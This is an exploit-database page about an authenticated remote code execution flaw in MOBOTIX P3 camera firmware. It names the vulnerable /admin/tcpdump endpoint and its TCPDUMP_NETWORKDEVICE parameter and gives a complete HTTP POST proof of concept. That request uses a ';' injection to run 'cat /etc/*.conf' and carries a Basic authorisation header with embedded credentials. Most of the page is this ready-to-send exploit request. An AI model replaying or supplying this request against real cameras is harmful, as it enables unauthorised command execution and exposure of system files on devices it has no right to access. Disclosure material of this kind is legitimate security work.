Advertisement






MOBOTIX P3 Cameras MX-System < 4.7.2.21 Authenticated Remote Code Execution Vulnerability

CVE Category Price Severity
CVE-2021-17260 CWE-77 Not specified High
Author Risk Exploitation Type Date
Erik Cottrell Critical Remote 2024-02-02
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020018

Below is a copy:

MOBOTIX P3 Cameras MX-System <4.7.2.21 Authenticated Remote Code Execution Vulnerability
#Summary
This vulnerability exists in versions of MOBOTIX P3 Cameras x14/x24/x15/x25, T24M/T25M prior to MX-System 4.7.2.21 firmware. Due to the lack of input validation in the request sent to "/admin/tcpdump", this vulnerability leads to authenticated remote code execution.

#Exploitation
In the affected module, tcpdump integration through the network interface has been observed via the web portal. The input in the "TCPDUMP_NETWORKDEVICE" parameter allows bypassing input validation by using the ";" character, enabling the execution of system commands.

# Proof of concept
POST /admin/tcpdump HTTP/1.1
Host: 127.0.0.1:5003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46bWVpbnNt
Connection: close
 
TCPDUMP_NETWORKDEVICE=%3bcat+/etc/*.conf&TCPDUMP_PROTOCOL=all&TCPDUMP_CAPTURETIMEOUT=1&TCPDUMP_IGNORE_IP=127.0.0.1&START_CAPTURE=Ba%C5%9Flat%2FDurdur

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.